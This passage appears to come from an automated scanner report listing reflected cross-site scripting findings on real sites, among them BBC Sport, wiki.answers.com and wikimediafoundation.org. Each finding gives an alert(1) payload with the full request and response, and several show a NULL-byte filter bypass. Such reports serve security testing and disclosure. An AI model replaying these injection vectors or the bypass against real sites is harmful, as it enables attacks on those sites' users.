       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '13264093',
       assetType: 'story',
   
...[SNIP]...

5.41. http://news.bbc.co.uk/sport2/hi/football/13265403.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/football/13265403.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c5d5'-alert(1)-'7c4d8b95eda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/football/13265403.stm?4c5d5'-alert(1)-'7c4d8b95eda=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:24:37 GMT
Keep-Alive: timeout=10, max=793
Expires: Tue, 03 May 2011 13:24:37 GMT
Connection: close
Set-Cookie: BBC-UID=44bd5c10a0a2b1a56e3ad0e501d37cc65546d17290b0f1bae4eb2ae4f00c46420Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:37 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=44bd5c10a0a2b1a56e3ad0e501d37cc65546d17290b0f1bae4eb2ae4f00c46420Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:37 GMT; path=/; domain=bbc.co.uk;
Content-Length: 57720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1304429077000,
       editionToServe: 'international',
       queryString: '4c5d5'-alert(1)-'7c4d8b95eda=1',
       referrer: null,
       section: 'europe',
       sectionPath: '/football',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '13265403',
       assetType: 'story',
       u
...[SNIP]...

5.42. http://news.bbc.co.uk/sport2/hi/formula_one/13267766.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/formula_one/13267766.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85dce'-alert(1)-'6caf575a209 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/formula_one/13267766.stm?85dce'-alert(1)-'6caf575a209=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:24:40 GMT
Keep-Alive: timeout=10, max=793
Expires: Tue, 03 May 2011 13:24:40 GMT
Connection: close
Set-Cookie: BBC-UID=b43dec20105221e8be7af9149103b83b7eac2260d01081699b6bf29de43f11ae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:40 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=b43dec20105221e8be7af9149103b83b7eac2260d01081699b6bf29de43f11ae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:40 GMT; path=/; domain=bbc.co.uk;
Content-Length: 51706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1304429080000,
       editionToServe: 'international',
       queryString: '85dce'-alert(1)-'6caf575a209=1',
       referrer: null,
       section: 'formula-one',
       sectionPath: '/formula_one',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '13267766',
       assetType: 'stor
...[SNIP]...

5.43. http://rtradeinfo.bualuang.co.th/tradinginfo.services/price_update.php [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rtradeinfo.bualuang.co.th
Path:   /tradinginfo.services/price_update.php

Issue detail

The value of the lang request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56e60"><script>alert(1)</script>dd2fb90dfc7 was submitted in the lang parameter. This input was echoed as 56e60\"><script>alert(1)</script>dd2fb90dfc7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tradinginfo.services/price_update.php?lang=E56e60"><script>alert(1)</script>dd2fb90dfc7 HTTP/1.1
Host: rtradeinfo.bualuang.co.th
Proxy-Connection: keep-alive
Referer: http://www.bangkokbank.com/bangkok%20bank/pages/main.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:45:04 GMT
Server: Apache
X-Powered-By: PHP/4.3.3
Content-Type: text/html
Content-Length: 1780

<html>
<head>
<title>Loan Rates</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<link href="css/bbl_style.css" rel="stylesheet" type="text/css">
<style>
<!--
body {
   
...[SNIP]...
<a href="/tradinginfo.services/price_update.php?lang=E56E60\"><SCRIPT>ALERT(1)</SCRIPT>DD2FB90DFC7">
...[SNIP]...

5.44. http://rtradeinfo.bualuang.co.th/tradinginfo.services/price_update.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rtradeinfo.bualuang.co.th
Path:   /tradinginfo.services/price_update.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70aa3"><script>alert(1)</script>ec340b53f66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 70aa3\"><script>alert(1)</script>ec340b53f66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tradinginfo.services/price_update.php/70aa3"><script>alert(1)</script>ec340b53f66 HTTP/1.1
Host: rtradeinfo.bualuang.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:25:57 GMT
Server: Apache
X-Powered-By: PHP/4.4.6
Connection: close
Content-Type: text/html
Content-Length: 3524

<html>
<head>
<title>Loan Rates</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<link href="css/bbl_style.css" rel="stylesheet" type="text/css">
<style>
<!--
body {
   
...[SNIP]...
<a href="/tradinginfo.services/price_update.php/70aa3\"><script>alert(1)</script>ec340b53f66?lang=E">
...[SNIP]...

5.45. http://trends.atipat.co.cc/thailand-breast-slap/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trends.atipat.co.cc
Path:   /thailand-breast-slap/x22

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de0b9</script><script>alert(1)</script>95e29220397 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /thailand-breast-slapde0b9</script><script>alert(1)</script>95e29220397/x22 HTTP/1.1
Host: trends.atipat.co.cc
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 13:28:55 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
X-Pingback: http://trends.atipat.co.cc/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=ffa5b357fe083908969281e173dca3b2; path=/
Last-Modified: Tue, 03 May 2011 13:28:56 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head pro
...[SNIP]...
<input onclick="this.select();" id="permalink" name="permalink" type="text" value="http://trends.atipat.co.cc/thailand-breast-slapde0b9</script><script>alert(1)</script>95e29220397/x22" />
...[SNIP]...

5.46. http://trends.atipat.co.cc/thailand-breast-slap/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trends.atipat.co.cc
Path:   /thailand-breast-slap/x22

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8be4</script><script>alert(1)</script>62b8c0eb977 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /thailand-breast-slap/x22c8be4</script><script>alert(1)</script>62b8c0eb977 HTTP/1.1
Host: trends.atipat.co.cc
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 13:29:31 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
X-Pingback: http://trends.atipat.co.cc/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=c218762d50aa02f115e7ac168d966505; path=/
Last-Modified: Tue, 03 May 2011 13:29:31 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head pro
...[SNIP]...
<input onclick="this.select();" id="permalink" name="permalink" type="text" value="http://trends.atipat.co.cc/thailand-breast-slap/x22c8be4</script><script>alert(1)</script>62b8c0eb977" />
...[SNIP]...

5.47. http://trends.atipat.co.cc/thailand-breast-slap/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trends.atipat.co.cc
Path:   /thailand-breast-slap/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe906</script><script>alert(1)</script>bead810e6a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /thailand-breast-slap/x22?fe906</script><script>alert(1)</script>bead810e6a8=1 HTTP/1.1
Host: trends.atipat.co.cc
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 13:28:00 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
X-Pingback: http://trends.atipat.co.cc/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=aacaa47ca502de63c9e105d1ba2c8a58; path=/
Last-Modified: Tue, 03 May 2011 13:28:00 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head pro
...[SNIP]...
<input onclick="this.select();" id="permalink" name="permalink" type="text" value="http://trends.atipat.co.cc/thailand-breast-slap/x22?fe906</script><script>alert(1)</script>bead810e6a8=1" />
...[SNIP]...

5.48. http://widgets.digg.com/buttons/count [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 4c2b1<script>alert(1)</script>1c49e6dcebc was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=file%3A///D%3A/cdn/2011/05/02/dork/sql-injection-http-put-injection-xss-traversal-weak-configuration-ghdb.html4c2b1<script>alert(1)</script>1c49e6dcebc HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=fb1af30888f0820a9f09d171b75eb93394e3b17bd833ffed352d5b5c4836e393; __utmz=146621099.1304250250.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1306842255367%26vn%3D1; s_vi=[CS]v1|26DEA3D10501174B-40000100A00037A2[CE]; __utma=146621099.2000529129.1304250250.1304250250.1304250250.1; s_nr=1304250295878

Response

HTTP/1.1 200 OK
Age: 0
Date: Tue, 03 May 2011 18:26:13 GMT
Via: NS-CACHE: 100
Etag: "f62052063fafe17b92b7a12041fdba368296b1d2"
Content-Length: 191
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Tue, 03 May 2011 18:36:12 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "file:///D:/cdn/2011/05/02/dork/sql-injection-http-put-injection-xss-traversal-weak-configuration-ghdb.html4c2b1<script>alert(1)</script>1c49e6dcebc", "diggs": 0});

5.49. http://wiki.answers.com/Q/Who_is_Director_of_Barkley_Bank_London [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/Who_is_Director_of_Barkley_Bank_London

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfa8d"><script>alert(1)</script>ba33fe466f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Qbfa8d"><script>alert(1)</script>ba33fe466f1/Who_is_Director_of_Barkley_Bank_London HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Tue, 03 May 2011 13:29:49 GMT
X-Varnish: 598908747
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 43007

           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="canonical" href="http://wiki.answers.com/Qbfa8d"><script>alert(1)</script>ba33fe466f1/Who_is_Director_of_Barkley_Bank_London" />
...[SNIP]...

5.50. http://wiki.answers.com/Q/Who_is_Director_of_Barkley_Bank_London [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/Who_is_Director_of_Barkley_Bank_London

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba5c9"><script>alert(1)</script>839fcaa3f68 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Q/Who_is_Director_of_Barkley_Bank_Londonba5c9"><script>alert(1)</script>839fcaa3f68 HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=lc64mcnme5fqp86ut2p3ka56v0; path=/; domain=.answers.com
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Tue, 03 May 2011 13:29:57 GMT
X-Varnish: 598910588
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 47853

           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com
...[SNIP]...
<base href="http://wiki.answers.com/Q/Who_is_Director_of_Barkley_Bank_Londonba5c9"><script>alert(1)</script>839fcaa3f68" target="_top">
...[SNIP]...

5.51. http://wiki.answers.com/Q/Who_is_Director_of_Barkley_Bank_London [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/Who_is_Director_of_Barkley_Bank_London

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5567c"><script>alert(1)</script>bedd0e03240 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Q/Who_is_Director_of_Barkley_Bank_London?5567c"><script>alert(1)</script>bedd0e03240=1 HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=fn8dtkt49vfaljcmtr184bmqa2; path=/; domain=.answers.com
Set-Cookie: fn8dtkt49vfaljcmtr184bmqa2=n%3A0%3A%7B%7D; path=/; domain=.answers.com
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Tue, 03 May 2011 13:29:17 GMT
X-Varnish: 1509837386
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 72177


                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:f
...[SNIP]...
<base href="http://wiki.answers.com/Q/Who_is_Director_of_Barkley_Bank_London?5567c"><script>alert(1)</script>bedd0e03240=1" target="_top">
...[SNIP]...

5.52. http://wikimediafoundation.org/wiki/Privacy_policy [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wikimediafoundation.org
Path:   /wiki/Privacy_policy

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload %00d5702<script>alert(1)</script>fa20ff08d87 was submitted in the REST URL parameter 2. This input was echoed as d5702<script>alert(1)</script>fa20ff08d87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /wiki/Privacy_policy%00d5702<script>alert(1)</script>fa20ff08d87 HTTP/1.1
Host: wikimediafoundation.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 13:30:08 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
X-Wikimedia-Debug: prot=http:// serv=wikimediafoundation.org loc=/wiki/Privacy_policy%00d5702<script>alert(1)</script>fa20ff08d87
Content-Length: 5466
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq63.wikimedia.org
X-Cache-Lookup: MISS from sq63.wikimedia.org:3128
X-Cache: MISS from sq61.wikimedia.org
X-Cache-Lookup: MISS from sq61.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://wikimediafoundation.org/wiki/Privacy_poli
...[SNIP]...
<p style="font-weight: bold;">To check for "Privacy_policy%00d5702<script>alert(1)</script>fa20ff08d87" on Wikipedia, see:
<a href="http://en.wikipedia.org/wiki/Privacy_policy%00d5702<script>
...[SNIP]...

5.53. http://wikimediafoundation.org/wiki/Privacy_policy [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wikimediafoundation.org
Path:   /wiki/Privacy_policy

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009f08c"><script>alert(1)</script>7fdeaf40061 was submitted in the REST URL parameter 2. This input was echoed as 9f08c"><script>alert(1)</script>7fdeaf40061 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /wiki/Privacy_policy%009f08c"><script>alert(1)</script>7fdeaf40061 HTTP/1.1
Host: wikimediafoundation.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 13:30:04 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
X-Wikimedia-Debug: prot=http:// serv=wikimediafoundation.org loc=/wiki/Privacy_policy%009f08c"><script>alert(1)</script>7fdeaf40061
Content-Length: 5494
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq73.wikimedia.org
X-Cache-Lookup: MISS from sq73.wikimedia.org:3128
X-Cache: MISS from sq63.wikimedia.org
X-Cache-Lookup: MISS from sq63.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://wikimediafoundation.org/wiki/Privacy_poli
...[SNIP]...
<a href="http://en.wikipedia.org/wiki/Privacy_policy%009f08c"><script>alert(1)</script>7fdeaf40061" title="Wikipedia:Privacy_policy%009f08c">
...[SNIP]...

5.54. http://wikimediafoundation.org/wiki/Special:Landingcheck [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wikimediafoundation.org
Path:   /wiki/Special:Landingcheck

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload %00e48e6<script>alert(1)</script>6b2df5a64d6 was submitted in the REST URL parameter 2. This input was echoed as e48e6<script>alert(1)</script>6b2df5a64d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /wiki/Special:Landingcheck%00e48e6<script>alert(1)</script>6b2df5a64d6 HTTP/1.1
Host: wikimediafoundation.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 13:30:30 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
X-Wikimedia-Debug: prot=http:// serv=wikimediafoundation.org loc=/wiki/Special:Landingcheck%00e48e6<script>alert(1)</script>6b2df5a64d6
Content-Length: 5502
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq60.wikimedia.org
X-Cache-Lookup: MISS from sq60.wikimedia.org:3128
X-Cache: MISS from sq73.wikimedia.org
X-Cache-Lookup: MISS from sq73.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://wikimediafoundation.org/wiki/Special:Land
...[SNIP]...
<p style="font-weight: bold;">To check for "Special:Landingcheck%00e48e6<script>alert(1)</script>6b2df5a64d6" on Wikipedia, see:
<a href="http://en.wikipedia.org/wiki/Special:Landingcheck%00e48e6<script>
...[SNIP]...

5.55. http://wikimediafoundation.org/wiki/Special:Landingcheck [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wikimediafoundation.org
Path:   /wiki/Special:Landingcheck

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00e5fe7"><script>alert(1)</script>584d06cffe9 was submitted in the REST URL parameter 2. This input was echoed as e5fe7"><script>alert(1)</script>584d06cffe9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /wiki/Special:Landingcheck%00e5fe7"><script>alert(1)</script>584d06cffe9 HTTP/1.1
Host: wikimediafoundation.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 13:30:23 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
X-Wikimedia-Debug: prot=http:// serv=wikimediafoundation.org loc=/wiki/Special:Landingcheck%00e5fe7"><script>alert(1)</script>584d06cffe9
Content-Length: 5530
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq78.wikimedia.org
X-Cache-Lookup: MISS from sq78.wikimedia.org:3128
X-Cache: MISS from sq61.wikimedia.org
X-Cache-Lookup: MISS from sq61.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://wikimediafoundation.org/wiki/Special:Land
...[SNIP]...
